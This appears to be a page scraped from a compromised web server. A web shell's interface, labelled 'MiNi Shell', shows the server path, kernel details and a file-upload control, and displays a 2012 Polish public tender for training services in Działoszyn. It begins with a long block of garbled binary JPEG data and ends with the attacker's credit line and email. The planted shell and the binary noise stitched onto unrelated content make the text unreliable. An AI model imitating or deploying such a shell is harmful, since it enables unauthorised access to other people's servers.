JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120424/131248-N-2012.html

<p class="kh_header"><b>Działoszyn: postępowanie o udzielenie zamówienia publicznego na świadczenie usług szkoleniowych w ramach Projektu Otwarci na jutro</b><br>
<b>Numer ogłoszenia: 131248 - 2012; data zamieszczenia: 24.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej w Działoszynie , ul. Grota-Roweckiego 1, 98-355 Działoszyn, woj. łódzkie, tel. 0-43 841 36 56, faks 0-43 843 74 40.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dzialoszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> postępowanie o udzielenie zamówienia publicznego na świadczenie usług szkoleniowych w ramach Projektu Otwarci na jutro.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie usług szkoleniowych i dostaw towarów ściśle z tymi usługami związanych dla 22 osób zamieszkałych na terenie Miasta i Gminy Działoszyn, w wieku aktywności zawodowej, korzystających ze świadczeń pomocy społecznej MGOPS w Działoszynie - uczestników Projektu Otwarci na jutro współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Poddziałania 7.1.1 POKL,  Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej 
1. 30 godzin dydaktycznych warsztatu kompetencji psychospołecznych prowadzonych przez psychologa dla 22 Uczestników projektu 2. 110 godzin dydaktycznych indywidualnego poradnictwa psychologicznego prowadzonego przez psychologa, po 5 godzin dydaktycznych dla 22 Uczestników projektu 3.30 godzin dydaktycznych warsztatu kompetencji wychowawczych prowadzonych przez psychologa dla 22 Uczestników projektu 4. 110 godzin dydaktycznych indywidualnego poradnictwa kompetencji wychowawczych prowadzonego przez psychologa, po 5 godzin dydaktycznych dla 22 Uczestników projektu 5.24 godziny dydaktyczne warsztatu stylizacji i wizażu prowadzonego przez wizażystę dla 22 Uczestników projektu (2 grupy po 12 godzin dydaktycznych) 6.40 godzin dydaktyczne warsztatu ABC przedsiębiorczości prowadzonego przez specjalistę dla 22 Uczestników projektu 7. 30 godzin dydaktycznych warsztatu doradztwa zawodowego prowadzonego przez doradcę zawodowego dla 22 Uczestników projektu 8.110 godzin dydaktycznych indywidualnego poradnictwa zawodowego prowadzonego przez doradcę zawodowego, po 5 godzin dydaktycznych dla 22 Uczestników projektu 9. kurs kucharz - kelner - zgodne z Krajowymi standardami kwalifikacji zawodowych dla 10 Uczestników projektu 10. Kurs Handlowiec z obsługą kas fiskalnych Zgodne z Krajowymi standardami kwalifikacji zawodowych - dla 5 Uczestników projektu 11.Kurs obsługi Koparko - ładowarki Zgodne z Krajowymi standardami kwalifikacji zawodowych - dla 7 Uczestników projektu 
W ramach przedmiotu zamówienia wykonawca zobowiązuje się do:
a)przygotowania szczegółowego programu, planu i harmonogramu oraz materiałów szkoleniowych i dydaktycznych, w tym materiały pomocnicze i piśmienne (notatnik, długopis, teczka)
b)realizacji poszczególnych zadań, w tym szkoleń, kursów i doradztwa przez wykwalifikowaną kadrę dydaktyczną i specjalistów w danej dziedzinie, z uwzględnieniem specyfiki osób szkolonych
c)koordynacji oraz nadzoru merytorycznego i metodycznego nad realizowanymi zadaniami,
d)bieżącej współpracy z Zamawiającym w zakresie związanym z realizacją zamówienia,
e)prowadzenia dokumentacji związanej z realizacją zamówienia, w tym dokumentacji szkoleń, kursów, doradztwa, ściśle wg wytycznych Zamawiającego,
f)zapewnienia sal szkoleniowych dla potrzeb realizowanych szkoleń, kursów i doradztwa (Warsztaty kompetencji psychospołecznych, Indywidualne poradnictwo psychologiczne, warsztat kompetencji wychowawczych,  Indywidualne poradnictwo kompetencji wychowawczych,  Warsztaty stylizacji i wizażu, Warsztaty ABC przedsiębiorczości, Warsztaty doradztwa zawodowego, Indywidualne poradnictwo zawodowe oraz kursy zawodowe, które Wykonawca ma możliwość przeprowadzić  na terenie gminy Działoszyn 
g)zapewnienie w ramach realizacji wskazanych szkoleń, kursów i doradztwa kursy zawodowe tj. Kurs Kucharz - kelner, Kurs obsługi koparko - ładowarki odbywających się poza Działoszynem  - usług dodatkowych: transport i pełne całodzienne wyżywienie
h)zapewnienia materiałów szkoleniowych, dydaktycznych, pomocniczych i piśmiennych dla wszystkich uczestników szkoleń, kursów i doradztwa,
i)zapewnienia wyżywienia w formie cateringu w formie obiadu i przerwy kawowej dla 22 uczestników szkoleń, kursów i doradztwa w każdym dniu prowadzenia zajęć
j)zapewnienia ubezpieczenia NNW dla 22 uczestników szkoleń, kursów i doradztwa,
k)wydania uczestnikom szkoleń, kursów i doradztwa świadectw końcowych na zakończenie udziału w szkoleniach, kursach, doradztwie,
l)stosowania odpowiednich działań informacyjnych i promocyjnych zgodnie z wytycznymi i zaleceniami Zamawiającego
m)przekazania informacji o prowadzonych szkoleniach na stronie www.inwestycjawkadry.pl
n)zapewnienie realizacji szkoleń, kursów i doradztwa (kursy zawodowe tj. Kurs Kucharz - kelner,Kurs obsługi koparko - ładowarki) odbywających się poza Działoszynem, w odległości nie większej niż 100 km od Działoszyna
Szczegółowy zakres świadczonych usług objętych przedmiotem zamówienia określa Załącznik Nr 1 do SIWZ.
W ramach przedmiotu zamówienia Wykonawca zobowiązany jest także do :
1.przedstawienia raportu, w którym będzie zawarta informacja o jakości szkoleń, kursów i doradztwa (ankiety oceniające prowadzone wśród uczestników zajęć),
2.przeprowadzenia ankiet oceniających efektywność i jakość szkoleń, kursów i doradztwa
3.potwierdzenia kwalifikacji zawodowych uczestników szkoleń stosownymi dyplomami; w tym zaświadczeniem o ukończeniu kursu zgodne ze wzorem MEN.
W ramach usługi szkoleniowej zapewniony będzie:
catering - w szczególności obiady oraz przerwy kawowe dla każdego uczestnika w każdym dniu zajęć  
bezpłatne materiały szkoleniowe, dydaktyczne, pomocnicze i piśmienne dla każdego uczestnika zajęć
Wykonawca zobowiązuje się także do dostosowania częstotliwości szkoleń do możliwości czasowych uczestników szkoleń oraz do dostosowania się do stworzonego harmonogramu i ewentualnych późniejszych zmian zgłaszanych przez Zamawiającego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli
przepisy prawa nakładają obowiązek ich posiadania, tj. aktualnego wpisu do rejestru instytucji szkoleniowych prowadzonego przez właściwy miejscowo Wojewódzki Urząd Pracy oraz aktualnego wpisu do rejestru agencji zatrudnienia w zakresie agencji poradnictwa zawodowego;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania wiedzy i doświadczenia niezbędnego do wykonania przedmiotu zamówienia, tj. udokumentowania wykonania (zakończenia a nie rozpoczęcia i zakończenia) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, obejmujący, co najmniej 2(dwóch) usług związanych z realizacją warsztatów i/lub kursów i/lub szkoleń na rzecz osób zagrożonych wykluczeniem społecznym, o wartości nie mniejszej niż  30.000 zł brutto (trzydzieści tysięcy złotych) każda, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentów potwierdzających, że te usługi zostały wykonane należycie;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym - zamawiający nie stawia szczegółowych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazać, że będą dysponować osobami bezpośrednio uczestniczącymi w realizacji zamówienia posiadającymi kwalifikacje zawodowe, wykształcenie i doświadczenie zawodowe niezbędne do wykonania zamówienia, jak następuje:

Trener - psycholog, posiadający: 
-wykształcenie wyższe - mgr psychologii, 
-minimum 3-letnie doświadczenie na stanowisku wykładowcy/trenera, 

Trener - doradca zawodowy, posiadający: 
-wykształcenie wyższe kierunek - doradztwo zawodowe lub studia podyplomowe z zakresu doradztwa zawodowego 
-minimum 3-letnie doświadczenie na stanowisku wykładowcy/trenera, 

Trener - stylista i wizażysta, posiadający: 
-wykształcenie kierunkowe, 
-minimum 2-letnie doświadczenie na stanowisku wykładowcy/trenera, 

Trener - warsztatu ABC przedsiębiorczości: 
-wykształcenie wyższe z zakresu zarządzania lub studia podyplomowe z zakresu zarządzania, 
-minimum 3-letnie doświadczenie na stanowisku wykładowcy/trenera, 

Trener - specjalista  zakresie handlowiec, posiadający:
-wykształcenie wyższe z zakresu zarządzania lub marketingu lub studia podyplomowe z zakresu zarządzania lub marketingu
-minimum 3-letnie doświadczenie na stanowisku wykładowcy/trenera,
Trener - kursu kucharz - kelner:
-wykształcenie kierunkowe
-minimum 3 - letnie doświadczenie na stanowisku wykładowcy/trenera

Trener  kursu obsługi kas fiskalnych posiadający:
-wykształcenie kierunkowe
-minimum 3-letnie doświadczenie na stanowisku wykładowcy/trenera,

Trener  kursu obsługi koparko - ładowarek :
-wykształcenie kierunkowe 
-minimum 2-letnie doświadczenie na stanowisku wykładowcy/trenera,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w tym zakresie. Spełnienie warunku następuje poprzez złożenie oświadczenia o spełnianiu warunków udziału według wzoru stanowiącego załącznik numer 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a. formularz oferty według wzoru stanowiącego załącznik nr 3 do SIWZ wraz z opisem sposobu realizacji zamówienia   
b.  kalkulację składającą się z cen elementów usługi wymienionych w załączniku numer 1 do SIWZ z rozbiciem na godziny zajęć i ceny kursów dla każdego uczestnika które łącznie muszą dawać cenę ofertową</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zakres umowy może zostać zmieniony jeśli w wyniku decyzji doradcy zawodowego zmieni się liczba osób zakwalifikowanych na poszczególne kursy. Za zaniechane lub dodatkowo zamówione kursy wynagrodzenie będzie rozliczone według stawek wynikających z kalkulacji cen za poszczególne kursy dołączonej do oferty.  
2. Zmiana wynagrodzenia może nastąpić w wypadku zmiany w liczbie szkolonych osób gdy nie jest możliwe skierowanie na szkolenie wskazanej w SIWZ liczby osób.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dzialoszyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Grota Roweckiego 1 98-355 Działoszyn..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.05.2012 godzina 12:00, miejsce: Miejsko - Gminny Ośrodek Pomocy Społecznej w Działoszynie ul. Grota Roweckiego 1 98-355 Działoszyn..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki Zamawiający informuje, iż niniejsze postępowanie jest wszczynane bez zawartej umowy o dofinansowanie realizacji projektu. W przypadku braku finansowania zamawiający unieważni przedmiotowe postępowanie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com